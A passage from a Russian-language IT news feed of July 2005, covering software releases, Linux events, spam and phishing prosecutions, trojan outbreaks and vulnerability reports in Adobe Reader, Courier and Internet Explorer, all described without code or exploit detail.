сохраняется потолок цены в $6. Срок этого контракта истекает в ноябре 2007 года.
Подробности

10/07/2005 13:32 ПО Citrix для малых предприятий
Компания Citrix System выпустила Citrix Access Essentials - вариант своей системы управления приложениями Citrix Presentation Server (ранее MetaFrame), предназначенный для предприятий малого и среднего бизнеса. Как и основная версия ПО, SMB-вариант позволяет централизованно развертывать приложения, управлять ими и осуществлять к ним защищенный терминальный, удаленный и мобильный доступ. Цена Citrix Access Essentials составляет 250 долл. в расчете на рабочее место, максимальное количество пользователей ограничено 75-ю. В стоимость ПО включена цена лицензий на клиентский доступ к Windows Terminal Server. Лицензионное соглашение предусматривает возможность использования ПО на единственном сервере. Инструментарий снабжен упрощенным по сравнению с полноценной версией инсталлятором, но по функциональности система от Citrix Presentation Server не отличается. Осваивать SMB-клиентуру Citrix начала лишь недавно, до сих пор ее продукция применялась в основном в корпорациях, входящих в список Fortune 500.
Источник

10/07/2005 12:28 Пароли в Oracle
Опубликована статья Кучеренко А., в которой описываются алгоритмы шифрования пользовательских паролей в СУБД Oracle и механизмов проведения аутентификации и идентификации при удаленном подключении к серверу.
Статья

10/07/2005 11:46 Седьмой ежегодный фестиваль Linux
Администрация сайта Linux RuNet приглашают посетить Седьмой ежегодный фестиваль Linux, проходящий в живописных местах Калужской области. Фестиваль будет проходить в рамках Недели Линукс на Протве с 29-ого по 31-е июля 2005-ого года в Боровском районе Калужской области на берегу живописной реки Протвы. Количество участников фестиваля не ограничено, места под солнцем хватит всем. Организаторы фестиваля предоставят для его участников место для установки палатки, интересных собеседников и запас дров. Желающие принять участе могут посетить ссылку, приведённую ниже, для получения более подробной информации.
О Linuxfest

10/07/2005 11:12 Взлом PSP: первый серьезный успех
Единственное, что смогли сделать пираты с портативной игровой консолью PSP, это скопировать UMD диск с игрой и просмотреть его содержание, но сейчас произошел настоящий прорыв и это только начало. Вышел специальный патч, который меняет файл-образ игры Lumines так, что его можно запускать с Memory Stick (используется в PSP как карта памяти, а так же для хранения медиа контента), сообщает Internet.Ru. Метод запуска игр с карточки памяти уже есть, так что не за горами лавина пиратских релизов игр и патчей к ним. Единственное, что может остановить - это дороговизна Memory Stick больших объемов (2 ГБ карточка стоит более $300, а объем UMD дисков используемых в PSP составляет 1,8 ГБ), но флэш-память постепенно дешевеет. Если ''пиратский конвейер'' наладится, то PSP будет ожидать сногсшибательный успех в странах СНГ, в противном случае, мало кто захочет выкладывать по $50 за игру
Инструкции

10/07/2005 11:00 Две трети владельцев сайтов не задумываются об их производительности
Около 66% владельцев корпоративных сайтов говорят, что никогда не задумывались о проблемах, связанных с производительностью их интернет-представительств, а также о скорости обработки запросов технической поддержки, говорится в последнем исследовании маркетинговой компании Harte-Hanks. Исследование Harte-Hanks проводилось среди 1 000 ИТ-департаментов различных компаний в период с апреля по июнь текущего года. Также стало известно, что около 71% респондентов хотели бы иметь возможность отслеживать производительность работы сайтов. Имеют такую возможность только треть опрошенных. 70% опрошенных отметили, что хотели бы иметь возможность использования инструментов, отслеживающих предпочтения пользователей их сайтов, только 21% сказали, что ведут наблюдения за статистикой посещаемости различных разделов сайта и увязывают эти данные с потенциальным портретом пользователя.
Источник

10/07/2005 10:08 Google вкладывается в высоковольтный интернет
Компании Current Communications Group, предоставляющей своим клиентам интернет через электропроводку, удалось заманить в свои объятья сразу несколько акционеров-гигантов: Hearst, Goldman Sachs и, конечно же, Google. Несмотря на то, что руководство CCG не разглашает информацию об общей сумме полученных инвестиций, журнал The Wall Street Journal, утверждает, что речь идет о сотне миллионов долларов. Компания, как пишет CNET, намерена использовать полученные деньги на расширение своей сети передачи данных как на территории США, так и за рубежом.
Источник

9/07/2005 13:31 LG Electronics лицензировала Palm OS
Известная корпорация LG Electronics и компания PalmSource, поставляющая операционную систему для мобильных телефонов и устройств, объявили о том, что LG Electronics лицензировала Palm OS по всему миру. Теперь LG может разрабатывать и оснащать смартфоны на базе Palm OS. Представитель LG сообщил, что именно смартфонам так необходима хорошая мобильная ОС, а его компания как раз и собирается разработать несколько новых моделей этих устройств...
Источник

9/07/2005 12:24 Microsoft готовит к выпуску CRM 3.0
В конце года Microsoft выпустит новую версию своей системы управления отношениями с клиентами, CRM 3.0. В планах - специальная редакция для малых предприятий и платный сервис хостинга CRM-системы. В инструментарии появятся как минимум два новых модуля - для автоматизации кампаний адресного маркетинга и управления составлением графиков работы персонала. Улучшена интеграция с Outlook, пользовательский интерфейс Microsoft CRM сделан максимально приближенным к интерфейсу ее почтового клиента. Предыдущая версия, вышедшая в 2003 году, носила номер 1.2. По словам представителей Microsoft, переход сразу к версии 3.0 призван отразить широкий масштаб внесенных в систему изменений. Партнеры корпорации смогут через портал Microsoft Developers Network получить инструментарий, позволяющий создавать специализированные версии CRM-системы Microsoft для различных отраслей и интегрировать ее с произвольными приложениями.
Источник

9/07/2005 11:52 Дистрибутив на базе Debian от Mandriva, Progeny и Turbolinux
От источников, близких к Mandriva, Progeny и Turbolinux, стало известно, что три Linux-компании планируют на LinuxWorld в Сан-Франциско (США) в августе представить новый, созданный объединенными усилиями, корпоративный Linux-дистрибутив на базе Debian GNU/Linux. Новый дистрибутив, к созданию которого, возможно, присоединятся и другие компании, будет основан на последнем стабильном релизе проекта Debian — 3.1 «Sarge». Более того, новая разработка, в свою очередь, станет базой для будущих серверных дистрибутивов от компаний Mandriva, Progeny Linux Systems Inc. и Turbolinux Inc. Несмотря на то, что в дистрибутиве будут использоваться пакеты формата DEB, обещается и совместимость с RPM, родным для RHEL (Red Hat Enterprise Linux).
Будущий дистрибутив от Mandriva, Progeny и Turbolinux будет соответствовать стандарту LSB (Linux Standard Base) 2. А из потенциальных компаний-помощников в его создании упоминается Xandros Inc. Результат совместной работы трех компаний может стать серьезным конкурентом ведущих Linux-предложений от Novell и Red Hat.
Nixp.Ru

9/07/2005 11:29 Кража интернета со взломом
В Москве обезврежена группа сетевых взломщиков, которые похищали у доверчивых сограждан интернет-трафик. Преступники рассылали письма от имени компании, предоставлявшей клиентам интернет-услуги. Об этом сообщило ГУВД столицы: "Рассылка ложных писем происходила с почтовых ящиков iskratelocom@km.ru, support-iskra@km.ru и supportiskra-net@rambler.ru". С помощью таких сообщений виртуальные жулики похищали личные данные пользователей сети. Полученная информация позволяла хакерам менять пароли, блокировать нормальную работу компьютера-жертвы и воровать трафик. Информация о преступлении стала известна отделу по борьбе с экономическими преступлениями УВД ЮВАО г. Москвы. Оперативники узнали регистрационные данные почтовых ящиков, с которых отправляли письма. За серверами установили круглосуточный контроль, благо, что компании-владельцы находятся в Москве. В результате были установлены домашние адреса четырех преступников. Уголовное дело было возбуждено по статье "неправомерный доступ к компьютерной информации". Суд санкционировал обыск. Как сообщили "РГ" в ГУВД Москвы, в ходе обыска было изъято компьютерное оборудование, которое использовалось в преступной деятельности. Экспертно-криминалистический центр уже провел анализ. Специалисты обнаружили доказательства преступной деятельности группы. Все материалы этого уголовного дела уже переданы в суд для принятия решения, предусмотренного действующим законодательством.
"Российская газета"

9/07/2005 11:16 Украина четвертая в мире «пиратская страна»
Украина занимает четвертое место в мире по количеству пиратской продукции на аудио-рынке страны – 68%. Такие данные содержатся в докладе Международной федерации производителей фонограмм (IFPI). По данным IFPI, в 2004 году в мире было продано 1,2 миллиарда пиратских компакт-дисков на общую сумму 4,6 миллиарда долларов. Контрафактная аудиопродукция занимала 34 процента мирового рынка. Наиболее остро проблема пиратства, по данным IFPI, стоит в 31 стране. В десятку стран, в которых борьба с аудио-пиратством является первоочередной задачей, входят Бразилия, Индонезия, Китай, Мексика, Пакистан, Парагвай, Россия, Украина, а также единственная страна ЕС – Испания, передает «УНИАН». Первое место по количеству пиратской продукции занимает Парагвай, где пираты контролируют 99 процентов аудио-рынка. Второе место с 85% занимает Китай, третье - Индонезия (80%), четвертое - Украина (68%). Россия, по данным IFPI за 2004 год, по степени проникновения контрафактной продукции на рынок – 66% - находится на пятом месте. Между тем по объему пиратского рынка РФ уверенно занимает вторую позицию после Китая.
Источник

9/07/2005 10:01 Троянские кони галопируют по сетям
На сети во всем мире обрушилось нашествие программ-троянцев, предупреждает секьюрити-фирма. С вечера среды компания MessageLabs перехватила 54 тыс. копий новых троянцев Downloader. «Они очень эффективные — в поле subject электронных сообщений они используют текст, который уже применялся, — говорит старший технолог MessageLabs по антивирусам Алекс Шипп. — И откуда они только не приходят!» Сообщения, содержащие троянцев Downloader.abc и Downloader.xz, маскируются под предупреждения о спаме, исходящее якобы от системного администратора. В них предлагается запустить прилагаемый файл во избежания отключения учетной записи электронной почты. Люди легко обманываются и открывают вложение. После исполнения программы в компьютере открывается лазейка для хакеров. В заявлении MessageLabs говорится, что с точки зрения e-mail оба троянца имеют одни и те же характеристики. Уровень опасности оценивается как «высокий». В сообщении, содержащемся в троянцах, говорится: «В последнюю неделю ваша учетная запись e-mail используется для отправки большого числа спамерских сообщений. Пожалуйста, оторвитесь от работы на 5-10 минут и ознакомьтесь с прилагаемым документом, чтобы в будущем не иметь проблем с онлайновой службой. Если вы проигнорируете нашу просьбу, у нес не останется иного выхода, кроме как исключить вас из числа наших клиентов. С уважением, Отдел сетевого администрирования».
Источник

8/07/2005 17:19 Проблемы в инфраструктуре безопасности Debian решены
Проект Debian объявил о том, что инфраструктура обеспечения безопасности для двух последних стабильных релизов дистрибутива Debian GNU/Linux 3.1 (Sarge) и 3.0 (Woody) вновь полностью функционирует. Команда Debian Security Team готова предоставлять обновления к безопасности пакетов в обычном режиме. Как сообщил в почтовой рассылке Мартин Шульц (Martin Schulze), после выпуска Debian Sarge инфраструктура обеспечения безопасности испытывала некоторые проблемы, из-за которых команда специалистов по безопасности Debian не могла выпускать обновления к уязвимым пакетам. На данный момент все эти проблемы решены, и безопасность системы полностью восстановлена.
Nixp.Ru

8/07/2005 16:41 Межсетевые экраны внушают ложное чувство безопасности
90 процентов компаний сводят защиту собственных сетей исключительно к установке межсетевых экранов. С таким сообщением выступил эксперт центра суперкомпьютеров в Сан-Диего (SDSC) Эйб Сингер (Abe Singer). «Я не утверждаю, что межсетевые экраны вообще бесполезны, но спешу спросить: как много усилий вы прилагаете для обеспечения безопасности? Обеспечивайте безопасность внутри самой сети, а не только по ее периметру. Следует обеспокоиться тем, что делают пользователи. Потому что, если атакующий пройдет через периметр, то игра закончится», — приводит слова Сингера сайт Techworld.com. Сингер особо отмечает, что в течение 4 последних лет SDSC успешно обеспечивал безопасность своих сетей без межсетевых экранов. «В SDSC до сих пор не пользуются межсетевыми экранами. Поскольку нам необходимо защищать каждый хост, межсетевой экран оказывается для нас бесполезным». Сингер отметил, что сейчас существует концепция, согласно которой межсетевой экран становится обязательным элементом защиты. Он привел требования платежной системы Visa к электронным магазинам. Эти требования содержат пункт об установке межсетевого экрана, но не формируют никакого описания конфигурации всей системы. Эксперт SDSC твердо убежден в том, что межсетевые экраны не смогут остановить хакеров. В качестве меры для защиты информации Сингер рекомендует по возможности не открывать внешнего доступа к сервисам, предназначенным только для внутреннего пользования. «Опросы показывают, что 60 процентов угроз исходят изнутри, но 70 процентов пользователей при этом обеспокоены возможностью внешних хакерских атак», — говорит Сингер.
Подробности

8/07/2005 15:58 Американская полиция арестовала местного жителя за пользование чужим Wi-Fi
В США полиция арестовала жителя Флориды за то, что он самовольно подключался к чужой беспроводной сети передачи данных стандарта Wi-Fi, сообщает Associated Press. 41-летнего Бенджамина Смита обвиняют в несанкционированном проникновении в компьютерную сеть Ричарда Дайнона, который в минувшем апреле заметил, что Смит подъехал к его дому на автомобиле и стал пользоваться ноутбуком. Последующее разбирательство выявило, что Смит вошел в принадлежащую Дайнону беспроводную сеть и стал работать за его счет с Интернетом. Вместе с тем, что именно он делал в Интернете, не уточняется. Не сообщается также, была ли сеть Дайнона свободно доступной. Следует отметить, что практика беспроводных подключений сторонних пользователей к чьим-либо Wi-Fi-сетям - обычное явление во многих странах мира. Практика показывает, что зачастую пользователи, приобретая Wi-Fi-модемы и адаптеры, не заботятся о том, чтобы защитить соединение, и оставляют сеть, образующуюся в зоне радиоохвата, открытой для всех желающих (в то время как базовые принципы цифровой безопасности предполагают авторизацию с помощью логина и пароля).
Источник

8/07/2005 15:34 В Интернете зафиксирована очередная вирусная эпидемия
Специализирующиеся на компьютерной безопасности фирмы предупредили о массовом распространении в Интернете новой разновидности троянской программы Downloader. Как сообщает издание CNET News.com, повышенная активность данного вредоносного модуля фиксируется с вечера среды. Новые модификации вирусов, получившие названия Downloader.abc и Downloader.xz, используют традиционные методы распространения - они рассылают себя по почте, маскируясь под извещение от администратора почтового сервера, который якобы усмотрел в действиях получателя спамерскую активность. В письме утверждается, что в приложенном к нему файле содержится информация о том, как избежать закрытия почтового ящика. При открытии вложения происходит внедрение вируса в систему. Вирус традиционно делает зараженный компьютер доступным для удаленного администрирования, что обычно используется рассылающими вирусы хакерами для выполнения своих преступных задач. Специалисты рекомендуют пользователям соблюдать стандартные меры предосторожности, не открывать вложения к подозрительным письмам и пользоваться антивирусным ПО.
Подробности

8/07/2005 15:16 В Opera появилась поддержка протокола BitTorrent
Норвежская компания Opera объявила о выпуске предварительной (Technical Preview) версии браузера Opera 8.02 с поддержкой протокола BitTorrent. Протокол BitTorrent предусматривает распределение трафика между отдельными пользователями за счёт разделения файлов на отдельные фрагменты и их хранения на разных узлах сети. Чем больше людей обращаются к одному и тому же файлу, тем быстрее его удаётся скачать. Как отмечают представители Opera, совместимость браузера с протоколом BitTorrent должна облегчить загрузку больших объемов легальной информации, например, дистрибутивов открытой операционной системы Linux или демонстрационных версий игр. Кстати, установочный файл Opera 8.02 также распространяется по технологии BitTorrent. Поддержка протокола BitTorrent реализована в вариантах браузера Opera для операционных систем Microsoft Windows, Apple Mac OS и Linux. Однако разработчики настоятельно рекомендуют не устанавливать браузер поверх имеющейся версии и использовать его только в ознакомительных целях, поскольку не исключается возможность наличия в коде серьезных ошибок.
Источник

8/07/2005 15:03 Антивирусный плагин для браузера
В компании "Доктор Веб" разработан плагин для браузеров Internet Explorer или Mozilla, с помощью которого перед открытием любой страницы в интернете или закачкой файла на компьютер можно проверить, содержат ли они вирусы, рекламные программы, "дозвонщики" или шпионское ПО. Проверка осуществляется последней версией антивируса Dr.Web с полным набором вирусных баз, обновление которых производится не менее двух раз в час. При этом не требуется закачивать ни антивирусную программу, ни нужный файл на компьютер пользователя, так как проверка проводится на серверах компании "Доктор Веб". Проверка занимает несколько секунд, после чего можно открывать интересующую страницу или скачивать файл, не опасаясь вирусной атаки.
Подробности

8/07/2005 14:52 В Microsoft переоценивают защищенность компьютеров
Старший советник по безопасности Microsoft Детлеф Экерт (Detlef Eckert) заявил на конференции TechEd, организованной корпорацией в Амстердаме, что пользователи стали более осведомленными в вопросе защиты своих компьютеров. "Хотя интенсивность атак не спадает и сетевые черви все еще представляют опасность, общество пользователей в большинстве своем изменилось в лучшую сторону. Мы видим смену направления атак профессиональных преступников. Они стали более направленными и нацеленными на решение вопроса «как получить деньги?» Они занимаются фишерством для получения банковских реквизитов, шпионажем, использующим троянцев или ботнеты для атак «отказ в обслуживании», — сказал Экерт. Однако менеджер по продуктам ИТ-безопасности Microsoft Марио Хуарес (Mario Juarez) считает, что уровень пользования все еще недостаточно высок. В США только треть пользователей Windows XP установила Service Pack — последнее обновление с заплатками на множество уязвимостей. Недавно Microsoft завершила поглощение антивирусной компании Sybari и запустила сервис по удалению шпионских программ, на который подписались 20 млн. человек. Некоторые элементы сервиса предоставляются бесплатно, но, как сказал Экерт, антивирус будет продаваться. Microsoft готова бесплатно закрывать уязвимости в своей системе, но вирусы — это нечто не относящееся к ее ошибкам, сказал Экерт. Однако Грэм Клули (Graham Cluley), эксперт по антивирусам из компании ИТ-безопасности Sophos, не согласен с этим. На прошлой неделе он назвал Windows одной из величайших проблем в антивирусном мире. «Я уверен, что сейчас настоящая угроза кроется в компьютерах и серверах с Windows. В прошлом месяце мы увидели еще больше вредоносного ПО, и большая его часть нацелена на Windows. Существует один шанс из двух, что компьютер может заразиться всего спустя 12 минут после подключения к широкополосной сети», — сказал он. У Хуареса спросили, корректно ли продавать антивирус, который устраняет вирусы, использующие уязвимости Windows. Он ответил: «Это философский вопрос».
Источник

7/07/2005 14:33 Автор вируса-катастрофы легко отделается
Немецкий подросток, создавший вирус, который поразил компьютеры инвестиционного банка Goldman Sachs и авиакомпании British Airways, скорее всего, отделается незначительной мерой пресечения. Немецкий подросток во время состоявшегося во вторник заседания суда повторно признался в создании компьютерного червя Sasser, сообщает Associated Press. Заседание по делу девятнадцатилетнего Свена Яшана (Sven Jaschan) проходило в Вердене (на северо-западе Германии) за закрытыми дверями. Это связано с тем, что на момент совершения преступления хакеру не было и 18 лет. Обвиняемый вошёл в зал суда через боковую дверь и отказался отвечать на вопросы журналистов. Обвинения, среди которых нарушение работы общественных служб связи и незаконное изменение информации, грозят юному хакеру приговором на срок до 5 лет. Тем не менее, г-жа Крутцфельд объяснила, что поскольку подсудимый запустил вирус в глобальную сеть за несколько дней до своего восемнадлетия, то приговор может быть относительно мягким. По словам представителя суда Катарины Крутцфельд, подсудимый «признал свою вину во всех приписываемых ему преступлениях». Согласно судебному законодательству Германии, если ответчик признаёт свою вину, процесс не прерывается. Так что разбирательство будет продолжаться ещё несколько дней. Предполагают, что вердикт будет оглашён в четверг. Власти говорят, что Яшан уже признался в создании вируса в мае 2004 во время своего ареста, который состоялся примерно через неделю после того, как червь был выпущен в интернет (в ночь на 1 мая 2004 года) и поразил компьютеры компании British Airways, больниц Гонконга и отделений связи на Тайване.
Подробности

7/07/2005 12:56 Lufthansa и Siemens Business Services опробуют систему биометрической регистрации пассажиров
Немецкая авиакомпания пошла на этот шаг, стремясь ускорить обслуживание пассажиров и повысить безопасность перевозок. Техническая сторона проекта реализована в сотрудничестве с Siemens. На втором этапе работ по проекту "Trusted Traveller", который начнется в 2006 году, система будет внедрена в реальной линии обслуживания и охватит второй аэропорт, первоначально ограничиваясь пассажирами, часто совершающими перелеты. Организаторы проекта подчеркивают, что применение системы происходит на добровольных началах. Как же работает система? При сдаче багажа пассажиры Lufthansa проходят сканирование отпечатков пальцев. Отпечатки сохраняются в базе данных. Вместе с регистрационной информацией отпечаток пальца в зашифрованном виде (в форме штрихового кода) печатается на посадочном талоне. Во время посадки код в талоне сверяется с фактическим отпечатком пальца. Если данные совпадают, пассажир допускается на борт самолета. В настоящее время биометрические процедуры контроля пассажиров выполняются на добровольной основе, но в будущем могут стать обязательными при условии принятия соответствующей директивы ЕС.
Источник

7/07/2005 12:27 Европарламент отклонил законопроект о софтверных патентах
В среду при голосовании о принятии директивы Computer Implemented Inventions Directive (CIID) 648 из 729 членов парламента проголосовали против него. Представители Фонда Свободной информационной Ифраструктуры (Free Information Infrastructure), описали решение как большау победу для тех, кто проводил кампанию против принятия директивы CIID. Ее откланение гарантирует, что Европейские разработчики будут защищены от монополизации алгоритмов и приемов разработки программного обеспечения. В то время как многие разработчики программного обеспечения высказались против директивы с самого начала, большие компании лоббировали его, часто через группы кампаний (Business Software Alliance, CompTIA и Campaign for Creativity). Будущее директивы в настоящее время неясно. Возможно, что пересмотренная версия может быть обсуждена в будущем. Но в марте этого года, Чарли Маккриви, член Европейской Комиссии, сказал, что Комиссия не будет повторно рассматривать новую директиву, если Парламент отклонит текущую версию.
Источник

7/07/2005 12:25 Один из творцов интернета высказывается за создание новой глобальной сети
Дэвид Кларк, один из тех, кто руководил исследованиями в области сетей связи в 1970-ые годы, по сути, один из создателей интернета, задумал заменить своё детище чем-то более, на его взгляд, совершенным. Как сообщает Wired News, Кларк на данный момент сотрудничает со специалистами Национального научного фонда США (National Science Foundation, NSF) на предмет создания новой инфраструктуры для глобальной сети, которая, по замыслу Кларка и его единомышленников, придёт на смену существующей. На осень Национальный научный фонд запланировал объявление о принятии предложений по абсолютно новой архитектуре ("с чистого листа", как выразился Кларк); эти предложения будут тестироваться на общенациональной оптической сети National LambdaRail, которую исследовательские объединения используют для экспериментов с новыми сетевыми технологиями и приложениями. Пока же сам Кларк получил грант в размере 200 тысяч долларов на разработку собственной идеи. По мнению Кларка, нынешняя архитектура интернета, казавшаяся 30 лет назад венцом творения, сейчас играет против самой себя, сдерживая дальнейший рост и препятствуя модернизации. Новая архитектура, считает Кларк, откроет путь бесчисленным встроенным беспроводным устройствам связи, сенсорам, повысит степень безопасности электронной коммерции, и, в конечном счёте, сверхбыстрые соединения позволят реализовать мечту фантастов - трёхмерное киберпространство, "телепогружение".
Подробности

7/07/2005 12:24 В Acrobat Reader найдена опасная уязвимость
Компания Adobe Systems сообщила о наличии опасной уязвимости в программе Adobe Reader для операционных систем Unix и Linux. Используя дыру, злоумышленники теоретически могут выполнить произвольные деструктивные операции на удаленном компьютере. Для этого необходимо вынудить жертву открыть сформированный особым образом файл в формате PDF, который может быть, например, прислан по электронной почте или размещен на веб-сайте в интернете. При попытке просмотра такого файла на машине возникает ошибка переполнения буфера, провоцирующая последующий запуск вредоносного программного кода. Проблема связана с функцией UnixAppOpenFilePerform()
Подробности

6/07/2005 17:30 В Швеции запретили скачивать контрафакт
Швеция до последнего времени была единственной европейской страной, где скачивание нелицензионной музыки и фильмов для частного пользования было легальным. Как передает BBC, теперь и в этой стране интернетчику нужно быть предельно осмотрительным, чтобы не скачать чего-нибудь незаконного. На данный момент 10% шведов обмениваются мультимедийными файлами, расположенными на их компьютерах. Это самый высокий показатель в мире. Таким образом, получается, что 900 000 жителей этой страны станут пиратами, преступниками, если продолжат распространять и скачивать нелицензионный контент. По данным организации Antipiratbyran, один из 2000 Шведов хотя бы раз получал по почте предписание убрать из свободного доступа тот или иной защищенный копирайтом контент. В среднем по миру этот показатель составляет 1 из 7000 человек.
Подробности

6/07/2005 17:27 Московских фишеров будут судить
Материалы уголовного дела в отношении группы "фишеров", которые от имени интернет-провайдера "Искрателеком" рассылали абонентам сети письма, в которых выманивали их логины и пароли для доступа в интернет, передано в суд. В московском ГУВД считают, что вина злоумышленников полностью доказана. Московские фишеры рассылали ложные письма с адресов iskratelocom@km.ru, support-iskra@km.ru и supportiskra-net@rambler.ru, заведенных в бесплатных почтовых службах, и выдавали себя за службу поддержки "Искрытелеком".
Подробности

6/07/2005 17:22 Китай присоединяется к борьбе со спамом
Власти Китая поддержали международную инициативу, направленную на борьбу с несанкционированными рекламными рассылками по электронной почте. Согласно исследованию, проведенному компанией Sophos, в настоящее время по количеству поставляемого спама лидируют Соединенные Штаты. С расположенных на территории США серверов, в частности, поступает свыше 35 процентов от общего количества электронного "мусора". Второе место с примерно 25 процентами занимает Южная Корея. И замыкает тройку лидеров КНР - приблизительно 9,7 процента спама. Долгое время Китай не придавал особого значения проблеме несанкционированных почтовых рассылок в интернете. Однако на днях власти Пекина приняли решение присоединиться к "Лондонскому плану действий по сотрудничеству с целью борьбы со спамом", сообщает TechNewsWorld. Значительная часть спама сейчас поступает с так называемых компьютеров-зомби, владельцы которых могут даже не подозревать, что являются источником электронного "мусора". В конце мая нынешнего года 26 стран мира во главе с США развернули глобальный проект Operation Spam Zombies. Данная инициатива предполагает мониторинг почтовых серверов и блокировку компьютеров, замеченных в рассылке больших объемов электронной корреспонденции. Кстати, доля спама в настоящее время превышает 60 процентов от общего количества писем, пересылаемых по электронной почте. А наибольшее количество зомбированных компьютеров находятся на территории Европы.
Источник

4/07/2005 12:57 Уязвимость в почтовом сервере Courier
Cообщается о наличии уязвимости в популярном MTA Courier. Уязвимость связана с ошибкой в коде "rfc1035/spf.c", в результате которой (при просмотре SPF-записей в базе DNS-сервера) возникает ситуация освобождения незанятых (non-allocated) областей памяти, что может привести к отказу сервера (DoS). Уязвимость устранена в вышедшей версии 0.50.1.
Подробности

4/07/2005 12:15 "Пульт управления" для ПО Microsoft
Программный продукт Microsoft Identity Integration Server (MIIS) представляет собой механизм межсистемной интеграции на базе технологии метакаталогов, тиражирующий изменения в учетных записях, сделанные в одной системе, на остальные, подключенные к нему. Пользователи MIIS жалуются на чрезмерную сложность инструментария, и на 2007 год запланирован выпуск новой версии, обещающей сделать конфигурирование и развертывание сервера более простым. Тем временем эту задачу берет на себя программный продукт MissionControl 2.0, предлагаемый фирмой NetPro. Система реализует функции мониторинга, диагностики и аудита работы MIIS, обладая графическим пользовательским интерфейсом наподобие Outlook. Многие из задач, решение которых в MIIS требует написания сценариев, MissionControl позволяет выполнить при помощи несложных манипуляций мышью. Имеется удобное окно для просмотра и анализа протоколов MIIS, а также функции резервного копирования, восстановления и версионного контроля для коннекторов, при помощи которых MIIS обменивается данными с различными системами.
Источник

4/07/2005 12:00 США готовят второй федеральный антиспамерский вердикт
37-летний американец Питер Мошу (Peter Moshou) согласился признать себя виновным в нарушении одного из пунктов антиспамерского федерального закона США. Это означает, что Мошу станет одним из первых спамеров, осужденных с учетом этого акта, сообщает сайт Security Pipeline. По данным обвинителей, Мошу отправил несколько миллионов спамерских писем через провайдера EarthLink. За указанные деяния максимальным наказанием для Мошу могут стать лишение свободы на срок до 3 лет и штраф в размере до 350 тысяч долларов. Послания, которые спамер отправлял в 2004 и 2005 годах, содержали информацию о брокерских услугах для людей, намеревающихся продать свои таймшэры (права на пользование недвижимостью в течение определенного временного промежутка). В январе текущего года EarthLink подала гражданский иск против Мошу, а первое слушание по его делу состоялось 30 июня. По информации EarthLink, спамер рассылал свои письма с фальшивых адресов и писал отвлеченные фразы в теме писем. Таким образом, Мошу вводил пользователей в заблуждение относительно содержания посланий и не позволял им отписаться от своих писем. Перечисленные деяния запрещены антиспамерским федеральным законом от 2003 года. Мошу окажется вторым преступником, осужденным на основании этого закона, утверждает главный советник EarthLink Ларри Словенски (Larry Slovensky). Первое судебное решение с учетом положений антиспамерского федерального закона было вынесено в сентябре 2004 года в отношении Николаса Томброса. Дело Мошу является вторым процессом, в котором EarthLink принимает активное участие. В 2003 году компания отсудила 16,4 миллиона долларов у Говарда Кармака, который отправил 850 миллионов спам-писем. Спамер отправлял их с учетных записей, открытых с применением украденных идентификационных данных. В мае 2004 года суд приговорил Кармака к 7 годам лишения свободы.
Источник

4/07/2005 11:27 Столлман: Sun не помогает Open Source, а противостоит ему
Джонатан Шварц (Jonathan Schwartz), президент компании Sun Microsystems, на проходившей на этой неделе конференции JavaOne заявил, что бесплатность — важнейшая черта свободного и открытого программного обеспечения (FOSS). «… Если вы спросите, что для меня является наиболее важным началом в свободном и открытом ПО (FOSS), так это то, что, когда вы хотите добиться получения наибольшей части мирового рынка, для этого существует лишь одна цена, работающая повсеместно, и это — ее отсутствие… так что мы сосредоточили свои усилия на бесплатной части», заявил Шварц. Однако, как заметил Ричард Столлман (Richard Stallman), основатель Организации свободного программного обеспечения (Free Software Foundation, FSF), смысл «free» в FOSS определяется не ценой ПО, а его свободой. По его мнению, Шварц упустил главную суть, на которой основаны движения за свободное программное обеспечение и Open Source. «В движении “free software” под “free” понимается свобода. Кампания Open Source не представляет свободу с этической позиции, однако формулирует ее критерий условиями того, что позволено делать пользователям, — пояснил Столлман. — Поэтому Шварц упустил ключевой смысл — возможно, умышленно. Sun не поддерживает ни свободное программное обеспечение, ни Open Source, так что он просто пытается разом противостоять и тому, и другому, представляя их в ложном свете».
Nixp.Ru

4/07/2005 10:49 Cтатья "Безопасность ядра ОС UNIX"
Опубликована довольно интересная статья Аникеева А.В. (ФЗИ РГГУ), Гаврилова Ю.В. и Константинова В.П. (НИИ «Восход) под названием "Безопасность ядра ОС UNIX". В статье приводится код модуля ядра, который позволяет выполнить процессы от имени суперпользователя, а также скрыть своё присутствие в системе. Также рассматриваются основные утилиты для защиты ядра и программ - Rkdet, Chkrootkit. Основное внимание уделено программе LIDS - Linux Intrusion Detection System – система обнаружения и защиты от вторжений в операционную систему Linux (http://www.lids.org/), представляющей собой набор заплат для ядра Linux.
Cтатья

4/07/2005 10:26 Microsoft предупреждает о неисправленной ошибке в IE
Microsoft предупредила об уязвимости Internet Explorer после того, как аналитическая фирма опубликовала действующий эксплойт, демонстрирующий, как можно воспользоваться данной ошибкой. Уязвимость, обнаруженная компанией SEC Consult, позволяет злоумышленникам вызвать внезапное прекращение работы браузера и исполнить произвольный код. Она проявляется в версиях IE 6.0 на Windows 2000 с Service Pack 1, 3 и 4, а также на Windows XP с Service Pack 1 и 2. «Microsoft изучает опубликованное сообщение об уязвимости Internet Explorer. Нам пока не известно о каких-либо попытках атак с использованием этой уязвимости или о случаях ее влияния на работу заказчиков, — говорится в рекомендациях Microsoft. — Однако мы активно изучаем это сообщение». Соответствующий патч пока на вышел. В качестве временной меры софтверный гигант предлагает установить в IE «Высокий» уровень безопасности для зон «Интернет» и «Местная интрасеть», прежде чем исполнять элементы ActiveX. Предупреждение является частью недавно запущенной Microsoft программы, направленной на подтверждение сообщений о проблемах безопасности и предложение временных мер до выпуска исправлений. Данная ошибка обнаружена через две недели после выпуска Microsoft нескольких «критических» секьюрити-патчей, в том числе одного для IE. Эти патчи устраняли уязвимости, допускающие дистанционное исполнение кода.
Cообщение от Microsoft

3/07/2005 14:42 Нестандартное использование GPU
Группа исследователей из университета Северной Каролины разработала интересную библиотеку GPUSort, в которой используются средства сортировки, встроенные в GPU (Graphics Processing Units) современных графических плат. Анализ производительности новой библиотеки на видеокартах ATI X800 XT и NVIDIA GeForce 6800, показал значительный рост скорости сортировки по сравнению с работой стандартной функции qsort() на Pentium 4 3.2 GHz и Xeon 2.4 GHz, сообщает Opennet.ru.
О библиотеке GPUSort

3/07/2005 12:18 Microsoft заплатит IBM 775 миллионов долларов за OS/2
